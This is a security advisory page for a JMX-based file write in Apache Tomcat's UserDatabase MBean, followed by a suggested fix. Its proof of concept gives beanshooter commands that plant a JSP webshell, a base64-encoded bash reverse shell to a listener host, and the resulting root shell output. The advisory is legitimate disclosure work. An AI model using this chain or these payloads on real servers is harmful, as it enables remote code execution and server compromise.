{"id":19202,"date":"2022-11-24T13:47:07","date_gmt":"2022-11-24T12:47:07","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=19202"},"modified":"2022-11-24T13:47:15","modified_gmt":"2022-11-24T12:47:15","slug":"usd-2022-0035","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0035\/","title":{"rendered":"usd-2022-0035"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.18.0\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n

usd-2022-0035 | Partially Controlled File Write in Apache Tomcat via JMX<\/h1>\n

<\/span><\/p>\n

Advisory ID<\/strong>: usd-2022-0035
Product<\/strong>: Apache Tomcat
Affected Version<\/strong>: Tested on Apache Tomcat 9.0.58, probably others
Vulnerability Type<\/strong>: Improper Encoding or Escaping of Output (CWE-116)
Security Risk<\/strong>: Medium
Vendor URL<\/strong>: https:\/\/tomcat.apache.org\/<\/a>
Vendor acknowledged vulnerability<\/strong>: No
Vendor Status<\/strong>: Not fixed<\/p>\n

\n

The Tomcat documentation states that JMX access should be treated as local or admin access. Because of this, this issue does not meet the Apache Foundations bar for servicing in a security update. The issues enabling the abuse of the UserDatabase MBean to execute code on the server will be treated as a bug.<\/p>\n<\/blockquote>\n

Affected Component(s)<\/h3>\n

The vulnerability affects the UserDatabase JMX <\/a>component of Apache Tomcat<\/em>. This MBean<\/em> is capable of managing users and roles with access to the Apache Tomcat<\/em> server.<\/p>\n

Description<\/h3>\n

Apache Tomcat<\/em> is a popular open source webserver for running Java<\/em> based web applications and can be monitored via JMX<\/em>. JMX<\/em> (Java Management Extensions<\/em>), on the other hand, is a popular framework that allows monitoring and maintaining Java <\/em>based applications over the network. Unauthorized access to JMX<\/em> is a well known attack vector that grants the attacker plenty of possibilities to compromise the underlying application server. That being said, the overall exploitability strongly depends on the available MBeans<\/em>, the configured JMX<\/em> permissions and the presence of a Security Manager<\/em>. Depending on the above mentioned settings, the consequences of an attacker with JMX<\/em> access can range from critical Remote Code Execution<\/em> (RCE<\/em>) issues to medium severity information leakage.<\/p>\n

Finding new ways of abusing available MBeans<\/em> for malicious purposes is therefore an interesting target for attackers. We identified that the UserDatabase MBean<\/em>, which is available per default on Apache Tomcat<\/em> servers with JMX<\/em> enabled, can be abused to achieve a partially controlled file write. This file write is sufficient to create a JSP webshell<\/em> within the webroot of the server, which leads to remote code execution. The capability of writing webshells via JMX<\/em> is already known (e.g. by changing the log location of the server and creating malicious log entries). However, we consider this issue a security vulnerability because of two reasons:<\/p>\n

    \n
  1. The file write opportunity created by this issue is way more reliable when using log files.<\/li>\n
  2. The issue is caused by an encoding bug within the MemoryUserDatabase<\/em> implementation of Apache Tomcat\u00a0<\/em>and can be resolved by applying proper encoding within this component.<\/em><\/li>\n<\/ol>\n

    Proof of Concept<\/h3>\n

    For the following proof of concept, we use an Apache Tomcat<\/em> server located at 172.17.0.2<\/strong> with JMX<\/em> enabled on port 1090<\/strong>. Furthermore, we use the beanshooter <\/a>tool to demonstrating a possible attack.<\/p>\n

    First of all, we can enumerate available methods and attributes from the UserDatabase MBean<\/em> using the following command:<\/p>\n

    \n
    <\/span>[user@host ~]$ <\/span>beanshooter info 172<\/span>.17.0.2 1090<\/span> Users:type=<\/span>UserDatabase,database=<\/span>UserDatabase[+] MBean Class: org.apache.catalina.mbeans.MemoryUserDatabaseMBean<\/span>
    [+] ObjectName: Users:type=UserDatabase,database=UserDatabase<\/span>
    [+]<\/span>
    [+]     Attributes:<\/span>
    [+]         modelerType (type: java.lang.String , writable: false)<\/span>
    [+]         readonly (type: boolean , writable: false)<\/span>
    [+]         roles (type: [Ljava.lang.String; , writable: false)<\/span>
    [+]         groups (type: [Ljava.lang.String; , writable: false)<\/span>
    [+]         users (type: [Ljava.lang.String; , writable: false)<\/span>
    [+]         pathname (type: java.lang.String , writable: true)<\/span>
    [+]         writable (type: null , writable: false)<\/span>
    [+]<\/span>
    [+]     Operations:<\/span>
    [+]         java.lang.String findGroup(java.lang.String groupname)<\/span>
    [+]         java.lang.String createUser(java.lang.String username, java.lang.String password, java.lang.String fullName)<\/span>
    [+]         void removeGroup(java.lang.String groupname)<\/span>
    [+]         void removeUser(java.lang.String username)<\/span>
    [+]         void save()<\/span>
    [+]         java.lang.String findRole(java.lang.String rolename)<\/span>
    [+]         void removeRole(java.lang.String rolename)<\/span>
    [+]         java.lang.String createGroup(java.lang.String groupname, java.lang.String description)<\/span>
    [+]         java.lang.String findUser(java.lang.String username)<\/span>
    [+]         java.lang.String createRole(java.lang.String rolename, java.lang.String description)<\/span><\/pre>\n<\/div>\n
    <\/em><\/p>\n
    Apache Tomcat<\/em> users are usually defined within the file \/usr\/local\/tomcat\/conf\/tomcat-users.xml<\/strong>, but as one can see, the pathname<\/strong> property of the UserDatabase<\/em> is writable, and it is possible to change the location. Using the save<\/strong> method, it would then be possible to write the database to the specified location, but there is one problem, and this is the read-only <\/strong>property. This one prevents the database from being written:<\/p>\n
    \n
    <\/span>[user@host ~]$ <\/span>beanshooter attr 172<\/span>.17.0.2 1090<\/span> Users:type=<\/span>UserDatabase,database=<\/span>UserDatabase pathname \/usr\/local\/tomcat\/webapps\/ROOT\/database.xml
    [user@host ~]$ <\/span>beanshooter invoke 172<\/span>.17.0.2 1090<\/span> Users:type=<\/span>UserDatabase,database=<\/span>UserDatabase --signature 'save()'<\/span>
    [+] Call was successful.<\/span>...<\/span># <\/span>Apache Tomcat logs:org.apache.catalina.users.MemoryUserDatabase.save User database has been configured to be read only. Changes cannot be saved<\/span><\/pre>\n<\/div>\n
     <\/p>\n
    However, as it turns out, despite the property is marked as being non writable<\/em>, it is actually possible to modify its value. With this modification, it is possible to write the current user database into the webroot:<\/p>\n
    \n
    <\/span>[user@host ~]$ <\/span>beanshooter attr 172<\/span>.17.0.2 1090<\/span> Users:type=<\/span>UserDatabase,database=<\/span>UserDatabase readonly<\/span>
    true<\/span>
    [user@host ~]$ <\/span>beanshooter attr 172<\/span>.17.0.2 1090<\/span> Users:type=<\/span>UserDatabase,database=<\/span>UserDatabase readonly<\/span> false<\/span> --type boolean[user@host ~]$ <\/span>beanshooter attr 172<\/span>.17.0.2 1090<\/span> Users:type=<\/span>UserDatabase,database=<\/span>UserDatabase readonly<\/span>
    false<\/span>
    [user@host ~]$ <\/span>beanshooter attr 172<\/span>.17.0.2 1090<\/span> Users:type=<\/span>UserDatabase,database=<\/span>UserDatabase pathname \/usr\/local\/tomcat\/webapps\/ROOT\/database.xml[user@host ~]$ <\/span>beanshooter invoke 172<\/span>.17.0.2 1090<\/span> Users:type=<\/span>UserDatabase,database=<\/span>UserDatabase --signature 'save()'<\/span>
    [+] Call was successful.<\/span>
    [user@host ~]$ <\/span>curl 172<\/span>.17.0.2:8080\/database.xml
    <?xml version='1.0' encoding='utf-8'?><\/span>
    <tomcat-users xmlns=\"[http:\/\/tomcat.apache.org\/xml\"]()<\/span>
                  xmlns:xsi=\"[http:\/\/www.w3.org\/2001\/XMLSchema-instance\"]()<\/span>
                  xsi:schemaLocation=\"[http:\/\/tomcat.apache.org\/xml]() tomcat-users.xsd\"<\/span>
                  version=\"1.0\"><\/span>
    <\/tomcat-users><\/span><\/pre>\n<\/div>\n
     <\/p>\n
    From here, an attacker needs to change the file extension to .jsp<\/strong> and place a webshell payload within the user database. That being said, this task is not that easy, as the database is in XML<\/em> format and special characters get encoded. For example, creating a new user that contains the payload within the username is not sufficient:<\/p>\n
    \n
    <\/span>[user@host ~]$ <\/span>beanshooter invoke 172<\/span>.17.0.2 1090<\/span> Users:type=<\/span>UserDatabase,database=<\/span>UserDatabase --signature 'String createUser(String a, String b, String c)'<\/span> '<%Runtime.getRuntime().exec(request.getParameter(\"cmd\"));%>'<\/span> foo barUsers:type=User,username=\"<%Runtime.getRuntime().exec(request.getParameter(\\\"cmd\\\"));%<\/span>>\",database=UserDatabase<\/span>
    [user@host ~]$ <\/span>beanshooter attr 172.17.0.2 1090 Users:type=UserDatabase,database=UserDatabase pathname \/usr\/local\/tomcat\/webapps\/ROOT\/database.xml<\/span>
    [user@host ~]$ <\/span>beanshooter invoke 172.17.0.2 1090 Users:type=UserDatabase,database=UserDatabase --signature 'save()'<\/span>
    [+] Call was successful.<\/span>
    [user@host ~]$ <\/span>curl 172<\/span>.17.0.2:8080\/database.xml
    <?xml version='1.0' encoding='utf-8'?><\/span>
    <tomcat-users xmlns=\"[http:\/\/tomcat.apache.org\/xml\"]()<\/span>
                  xmlns:xsi=\"[http:\/\/www.w3.org\/2001\/XMLSchema-instance\"]()<\/span>
                  xsi:schemaLocation=\"[http:\/\/tomcat.apache.org\/xml]() tomcat-users.xsd\"<\/span>
                  version=\"1.0\"><\/span>
      <user username=\"&lt;%Runtime.getRuntime().exec(request.getParameter(&quot;cmd&quot;));%&gt;\" password=\"test\" fullName=\"test\" groups=\"\" roles=\"\"\/><\/span>
    <\/tomcat-users><\/span><\/pre>\n<\/div>\n
     <\/p>\n
    As demonstrated above, the payload gets XML<\/em> encoded and would not execute. However, looking at the source code of MemoryUserDatabase.java<\/strong> reveals
    that the XML<\/em> encoding is not applied to all attributes:<\/p>\n
    \n
    <\/span>\/\/ Print the file prolog<\/span><\/span>
    writer<\/span>.<\/span>println<\/span>(<\/span>\"<?xml version='1.0' encoding='utf-8'?>\"<\/span>);<\/span><\/span>
    writer<\/span>.<\/span>println<\/span>(<\/span>\"<tomcat-users xmlns=\\\"[http:\/\/tomcat.apache.org\/xml\\\"\"<\/span>);<\/span>]<\/span>()<\/span><\/span>
    writer<\/span>.<\/span>print<\/span>(<\/span>\"              \"<\/span>);<\/span><\/span>
    writer<\/span>.<\/span>println<\/span>(<\/span>\"xmlns:xsi=\\\"[http:\/\/www.w3.org\/2001\/XMLSchema-instance\\\"\"<\/span>);<\/span>]<\/span>()<\/span><\/span>
    writer<\/span>.<\/span>print<\/span>(<\/span>\"              \"<\/span>);<\/span><\/span>
    writer<\/span>.<\/span>println<\/span>(<\/span>\"xsi:schemaLocation=\\\"[http:\/\/tomcat.apache.org\/xml]() tomcat-users.xsd\\\"\"<\/span>);<\/span><\/span>
    writer<\/span>.<\/span>println<\/span>(<\/span>\"              version=\\\"1.0\\\">\"<\/span>);<\/span><\/span>\/\/ Print entries for each defined role, group, and user<\/span><\/span>
    Iterator<\/span><?><\/span> <\/span>values<\/span> <\/span>=<\/span> <\/span>null<\/span>;<\/span><\/span>
    values<\/span> <\/span>=<\/span> <\/span>getRoles<\/span>();<\/span><\/span>
    while<\/span> <\/span>(<\/span>values<\/span>.<\/span>hasNext<\/span>())<\/span> <\/span>{<\/span><\/span>
        <\/span>writer<\/span>.<\/span>print<\/span>(<\/span>\"  \"<\/span>);<\/span><\/span>
        <\/span>writer<\/span>.<\/span>println<\/span>(<\/span>values<\/span>.<\/span>next<\/span>());<\/span><\/span>
    }<\/span><\/span>
    values<\/span> <\/span>=<\/span> <\/span>getGroups<\/span>();<\/span><\/span>
    while<\/span> <\/span>(<\/span>values<\/span>.<\/span>hasNext<\/span>())<\/span> <\/span>{<\/span><\/span>
        <\/span>writer<\/span>.<\/span>print<\/span>(<\/span>\"  \"<\/span>);<\/span><\/span>
        <\/span>writer<\/span>.<\/span>println<\/span>(<\/span>values<\/span>.<\/span>next<\/span>());<\/span><\/span>
    }<\/span><\/span>
    values<\/span> <\/span>=<\/span> <\/span>getUsers<\/span>();<\/span><\/span>
    while<\/span> <\/span>(<\/span>values<\/span>.<\/span>hasNext<\/span>())<\/span> <\/span>{<\/span><\/span>
        <\/span>writer<\/span>.<\/span>print<\/span>(<\/span>\"  \"<\/span>);<\/span><\/span>
        <\/span>writer<\/span>.<\/span>println<\/span>(((<\/span>MemoryUser<\/span>)<\/span> <\/span>values<\/span>.<\/span>next<\/span>()).<\/span>toXml<\/span>());<\/span><\/span>
    }<\/span><\/span><\/pre>\n<\/div>\n
    Only for user objects the toXml<\/strong> function is invoked, whereas roles and groups seem to be written as plaintext. This encoding issue
    can be exploited by an attacker to inject arbitrary content into the user database file. The following example shows how an attacker can
    successfully deploy a webshell:<\/p>\n
    \n
    <\/span>[user@host ~]$ <\/span>beanshooter attr 172<\/span>.17.0.2 1090<\/span> Users:type=<\/span>UserDatabase,database=<\/span>UserDatabase pathname \/usr\/local\/tomcat\/webapps\/ROOT\/shell.jsp[user@host ~]$ <\/span>beanshooter invoke 172<\/span>.17.0.2 1090<\/span> Users:type=<\/span>UserDatabase,database=<\/span>UserDatabase --signature 'createRole(String groupname, String description)'<\/span> '\"><%Runtime.getRuntime().exec(request.getParameter(\"cmd\"));%><a\"'<\/span> fooUsers:type=Role,rolename=\"\\\"><%Runtime.getRuntime().exec(request.getParameter(\\\"cmd\\\"));%<\/span>><a\\\"<\/span>\",database=UserDatabase<\/span>
    [user@host ~]$ <\/span>beanshooter invoke 172.17.0.2 1090 Users:type=UserDatabase,database=UserDatabase --signature 'save()'<\/span>
    [user@host ~]$ <\/span>curl '172.17.0.2:8080\/shell.jsp?cmd=bash+-c+echo%24%7BIFS%7DYmFzaCAtaSAmPiAvZGV2L3RjcC8xNzIuMTcuMC4xLzQ0NDQgMDwmMQ%3D%3D%7Cbase64%24%7BIFS%7D-d%7Cbash'<\/span>
    [user@host ~]$ <\/span>nc -vlp 4444<\/span>
    Ncat: Version 7.92 ( [https:\/\/nmap.org\/ncat]() )<\/span>
    Ncat: Listening on :::4444<\/span>
    Ncat: Listening on 0.0.0.0:4444<\/span>
    Ncat: Connection from 172.17.0.2.<\/span>
    Ncat: Connection from 172.17.0.2:40392.<\/span>
    bash: cannot set terminal process group (1): Inappropriate ioctl for device<\/span>
    bash: no job control in this shell<\/span>
    root@436849b8da96:\/usr\/local\/tomcat#<\/span><\/pre>\n<\/div>\n
    Fix<\/h3>\n
    The UserDatabase<\/em> implementation in MemoryUserDatabase.java<\/strong> should apply XML<\/em> encoding to all printed objects and not
    only to the user object. Furthermore, the readonly<\/strong> attribute of the UserDatabase MBean<\/em> should be adjusted. It should
    either be non writable<\/em> (as suggested by the documentation) or the documentation should be adjusted to reflect that the
    attribute is actually writable.<\/p>\n
    References<\/h3>\n